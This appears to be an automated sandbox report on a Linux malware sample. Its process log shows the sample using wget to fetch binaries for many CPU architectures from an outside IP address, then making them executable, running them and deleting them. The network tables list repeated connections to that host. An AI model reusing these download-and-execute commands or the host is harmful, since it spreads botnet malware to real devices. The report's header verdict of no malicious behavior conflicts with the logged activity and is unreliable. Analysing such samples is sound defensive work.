Analysis Overview
SHA256
315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1
Threat Level: No (potentially) malicious behavior was detected
The file b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-17 04:29
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:29
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:29
Platform
debian9-mipsel-20240418-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:32
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
128s
Command Line
Signatures
Processes
/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
[/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118]
/usr/bin/wget
[wget http://171.22.24.217/m-i.p-s.GHOUL]
/bin/chmod
[chmod +x m-i.p-s.GHOUL]
/tmp/m-i.p-s.GHOUL
[./m-i.p-s.GHOUL]
/bin/rm
[rm -rf m-i.p-s.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/m-p.s-l.GHOUL]
/bin/chmod
[chmod +x m-p.s-l.GHOUL]
/tmp/m-p.s-l.GHOUL
[./m-p.s-l.GHOUL]
/bin/rm
[rm -rf m-p.s-l.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/s-h.4-.GHOUL]
/bin/chmod
[chmod +x s-h.4-.GHOUL]
/tmp/s-h.4-.GHOUL
[./s-h.4-.GHOUL]
/bin/rm
[rm -rf s-h.4-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/x-8.6-.GHOUL]
/bin/chmod
[chmod +x x-8.6-.GHOUL]
/tmp/x-8.6-.GHOUL
[./x-8.6-.GHOUL]
/bin/rm
[rm -rf x-8.6-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-6.GHOUL]
/bin/chmod
[chmod +x a-r.m-6.GHOUL]
/tmp/a-r.m-6.GHOUL
[./a-r.m-6.GHOUL]
/bin/rm
[rm -rf a-r.m-6.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/x-3.2-.GHOUL]
/bin/chmod
[chmod +x x-3.2-.GHOUL]
/tmp/x-3.2-.GHOUL
[./x-3.2-.GHOUL]
/bin/rm
[rm -rf x-3.2-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-7.GHOUL]
/bin/chmod
[chmod +x a-r.m-7.GHOUL]
/tmp/a-r.m-7.GHOUL
[./a-r.m-7.GHOUL]
/bin/rm
[rm -rf a-r.m-7.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/p-p.c-.GHOUL]
/bin/chmod
[chmod +x p-p.c-.GHOUL]
/tmp/p-p.c-.GHOUL
[./p-p.c-.GHOUL]
/bin/rm
[rm -rf p-p.c-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/i-5.8-6.GHOUL]
/bin/chmod
[chmod +x i-5.8-6.GHOUL]
/tmp/i-5.8-6.GHOUL
[./i-5.8-6.GHOUL]
/bin/rm
[rm -rf i-5.8-6.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/m-6.8-k.GHOUL]
/bin/chmod
[chmod +x m-6.8-k.GHOUL]
/tmp/m-6.8-k.GHOUL
[./m-6.8-k.GHOUL]
/bin/rm
[rm -rf m-6.8-k.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/p-p.c-.GHOUL]
/bin/chmod
[chmod +x p-p.c-.GHOUL]
/tmp/p-p.c-.GHOUL
[./p-p.c-.GHOUL]
/bin/rm
[rm -rf p-p.c-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-4.GHOUL]
/bin/chmod
[chmod +x a-r.m-4.GHOUL]
/tmp/a-r.m-4.GHOUL
[./a-r.m-4.GHOUL]
/bin/rm
[rm -rf a-r.m-4.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-5.GHOUL]
/bin/chmod
[chmod +x a-r.m-5.GHOUL]
/tmp/a-r.m-5.GHOUL
[./a-r.m-5.GHOUL]
/bin/rm
[rm -rf a-r.m-5.GHOUL]
Network
| Country | Destination | Domain | Proto |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| GB | 195.181.164.19:443 | tcp | |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:32
Platform
debian9-armhf-20240611-en
Max time network
18s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |